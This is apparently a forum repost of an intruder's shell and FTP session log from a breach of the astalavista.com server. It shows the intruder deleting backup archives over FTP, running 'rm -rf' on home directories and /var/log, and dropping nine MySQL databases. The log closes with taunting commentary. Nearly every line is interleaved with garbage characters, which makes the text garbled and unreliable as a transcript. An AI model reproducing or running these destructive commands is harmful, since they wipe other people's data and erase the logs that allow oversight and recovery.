. U) }' f- ?; [2 S6 Z' aftp> cd astalavista.com1 X5 ^8 a) `; f1 o4 D
250 CWD command successful.
8 v( Z- w9 E3 y! K0 E% Sftp> ls -la
$ T0 ?$ y/ E' }8 S) q227 Entering Passive Mode (212,254,194,163,2,189)
- W1 }3 u/ n2 {7 X, n9 ]& d; F0 I7 n150 Opening BINARY mode data connection for ‘file list’.
0 {- p% N4 }5 r$ u8 h) I-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
& Q5 W$ E8 W( o$ g! g-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2- T3 N7 {0 J4 b J# D9 |1 N' b( i* Z
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
3 {6 Z( Q7 f8 t8 h-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar4 h, j) E3 `7 x0 j% \
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
; ]& g( K8 L5 V[snip]
. a( n8 k$ O8 K3 @$ A6 u) _) G226 Transfer complete.
: V1 T0 v( [. w- b" O9 Sftp> mdelete *
( K. ]- c+ w6 z8 ]' `# Zftp> ls -la3 J9 x7 s; W U7 G* I
227 Entering Passive Mode (212,254,194,163,2,193)
) J9 U7 n: s- J: f150 Opening BINARY mode data connection for ‘file list’.7 j% ]+ D6 B( x# H5 J V1 a6 J
226 Transfer complete.. c9 W1 |2 n# z0 m6 \* N5 K
ftp>
9 m% \6 |4 x7 I. E5 W5 n
6 ^; ?( f+ `" U4 fsh-3.2# cd /home4 a6 \8 k+ X% q; V7 M
sh-3.2# ls -la5 |: |, \) u4 M: W0 ]
total 1204 X7 F% i8 A4 K: m# S
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
+ `2 d4 Z2 `) Q, @/ ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
* A' O& v' `& j" `# L2 b8 cdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
& {& L+ e2 m/ r* h' y0 N2 Q-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
2 j+ @6 s+ f" R-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
0 q! r7 V& R/ P, Rdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet/ T; t/ {/ D6 w; `
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
8 J/ A; e$ X: l* l7 Bdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161" V8 _6 n5 ^* Q, h
drwx–x–x 10 com com 4096 Apr 28 12:40 com# W( ]$ Q) p/ S7 z/ f
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
: I) d3 w z* U+ Q: Edrwx—— 3 jon jon 4096 Sep 21 2007 jon9 }* |) g. h5 E* \2 M6 j0 C# E2 l
drwx—— 2 root root 16384 Sep 11 2007 lost+found. u- y$ f# k2 Z4 a
drwxr-xr-x 2 root root 4096 Sep 14 2007 my* d& e. l. B$ X, m& y! y
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata) e+ q* _4 a1 c: z9 D, c9 V+ Q
drwx—— 2 jon jon 4096 Sep 15 2007 test4 k( i( F6 W" X7 ]; k* K8 w& D- D2 g
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp( `6 J# p- A8 w
* E( S6 o% W6 y" h$ z, i2 R8 x6 b" S
sh-3.2# rm -rf backup/
$ H) \# Y3 R/ c8 l0 ~5 T- ^sh-3.2# rm -rf backup.14161/) m5 I Y/ L! N5 T3 M
sh-3.2# rm -rf ftp/
, H) F; ^3 v h2 {sh-3.2# rm -rf jon/
- ^- v& j: U: q4 M2 ssh-3.2# rm -rf my/
. l# A- ]% R! h! k; u% bsh-3.2# rm -rf mysqldata/6 {! `# i( ~6 z+ D) U+ `- Z. W
sh-3.2# rm -rf test/1 V2 l! W) [4 G- s) v
sh-3.2# rm -rf tmp/
; N, A3 i; j3 `: j) k8 b% esh-3.2# cd ~
! F7 r4 c( j! C4 l8 ~( n. [sh-3.2# rm -rf *
9 N8 I9 M+ i* G: w! P: ysh-3.2# rm -rf /var/log/6 O5 Z' N8 N2 s) u$ x6 j) l) \
rm: cannot remove directory `/var/log//proftpd’: Directory not empty5 l( Z; |; k. x5 T' S
sh-3.2# rm -rf /home/*
R4 y$ T ?* J! I/ s# csh-3.2# mysql
% u7 K! m& s2 l' e: W7 {; J' a" mWelcome to the MySQL monitor. Commands end with ; or \g.7 H" v: N$ P) O
Your MySQL connection id is 407156
# |: ]) r' P' U- PServer version: 5.0.45-community-log MySQL Community Edition (GPL)
: r$ g5 z2 s5 ?) `7 l4 \" I$ s, ^8 M# G* U8 a, J: C( e4 V, f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.4 d, f) U7 F8 Q; I1 y& F
l1 H# o+ S; T j7 q9 D ^mysql> show databases;
# z8 f3 r3 D7 ^% F6 T+———————–+
6 d0 ?* F" k. I4 y& R| Database |$ O2 H& p, i/ p8 d: m' o7 _: C4 `2 t
+———————–+
# _+ a4 P4 ]) r1 g: B" f) G/ _| information_schema |
) C! T. V% e* H+ y, x7 K| astanet_ads |
, O3 @) K$ F; B. W3 }, U) v| astanet_mailing_lists |4 P/ r9 F, U, t4 }+ E% u$ m
| astanet_mediawiki |
% s( u- a$ v" n| astanet_membersystem |2 g0 M/ p9 M; r: }
| com_contrexx |
1 f; z6 X2 ]9 q: M5 t6 k" `* y4 ]| com_contrexx2 |: |- n3 P7 }+ a0 Y; v M+ H
| com_contrexx2_live |5 E* ?5 R7 S- c; F% p$ T4 M
| da_roundcube |# {+ V- @2 v- t7 i) N5 y9 D
| dolphin |3 ~) _2 _; F1 z6 U8 y
| ideapool |1 ~- n% O! `- \
| mysql | v3 a. }# d& w4 `
| test |, I/ V" p! I! h& ]' N
| yourmaster |: U' A6 G$ M% M
+———————–+
( F0 Q3 f5 a2 T+ v. l9 `14 rows in set (0.03 sec)
( R; ^* P4 ^) g% g3 K: R0 v# s$ X" {! w8 }' B3 S5 n/ r7 o
mysql> drop database astanet_membersystem;( J _! B2 x) R% Z6 A
droQuery OK, 46 rows affected (0.81 sec)
$ f9 Y! K% A) `% d5 R# {# a4 C$ ^ K0 t2 e9 L. |
mysql> drop database com_contrexx;( U5 B6 N" F9 N* L/ J7 F
Query OK, 211 rows affected (2.72 sec)
0 v/ M4 F2 H+ Q# K
; Z4 \3 e+ n9 X1 T& ~: u5 o" Q- Ymysql> drop database com_contrexx2;1 E9 p( ]+ m& D& w
Query OK, 237 rows affected (2.23 sec)" T% I \' a! d. P7 ]$ _; {7 b! W+ B% p
" C* [# z8 w: F" C
mysql> drop database com_contrexx2_live;! o0 n6 b1 b) ?/ g: h
Query OK, 227 rows affected (7.63 sec)5 w! K* q& H7 [! h# k) h
1 t/ |" l2 Q7 o* n8 umysql> drop database ideapool;
& R3 T- v5 V h5 w8 }8 KQuery OK, 69 rows affected (0.19 sec)
- |2 N5 ^) l& Z( D7 e3 S
0 r0 T' k' Q E2 r) y' {mysql> drop database yourmaster;
1 X; @1 ~, @+ kQuery OK, 158 rows affected (0.55 sec)
0 i( W: Z& W3 T5 T: i, C, u* @, J- d) Y* F9 Z- G2 r6 R
mysql> drop database astanet_ads;
: {1 w8 w( |$ K/ g8 h2 gQuery OK, 9 rows affected (0.11 sec)
1 l/ D, z; k' [; T3 ?& q e. y. ]& ]" I' l
mysql> drop database astanet_mailing_lists;
' r: ^5 g% s, g% F8 FQuery OK, 24 rows affected (1.47 sec)
8 F9 C2 @2 h! E$ c
' t9 }$ Y6 {# M0 t! l5 |! ^mysql> drop database astanet_mediawiki;
3 E4 \. L' c% W8 H5 ^Query OK, 31 rows affected (0.51 sec)2 t; V1 b- t6 R$ W* }
: x0 r( J" W" A4 M0 \7 |3 @. Y, S
mysql> show databases;7 g: G# J$ X7 Q* P# ~$ O
+——————–+0 b8 x# k0 I9 A, C
| Database |7 g# P# r( R) `" t' {+ h$ y B1 Z8 h
+——————–+4 c7 ~4 t0 u7 ?* y3 {( T5 |" n
| information_schema |
, O' T9 t/ Y/ Q+ |: R# t| da_roundcube |
: U( F: F, B! v! h4 {& A5 G| dolphin |
' e0 q/ R. r8 t3 U* N! Y2 l) x| mysql |
% L" f+ \' C; c5 c0 ~ D1 ^3 j| test |$ Y1 S9 G9 x4 g/ }0 L5 l5 H
+——————–+
! M; Z3 Z W; r5 rows in set (0.00 sec)( i, ]2 N: n; H5 Q& S9 q! R
/ Q. R( P5 m1 ~6 \/ ~- ]' N& g
What a journey! We’re not sure exactly why the “Terminator” had any influence on* m2 P4 n! E, Y' w* t* ]
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
) C! x3 T- K4 L/ r( U( Owrong to say this pack of morons *wont be back*.) V3 s- L& K! D
|
发表于 2012-11-6 21:07:34
收藏
支持
反对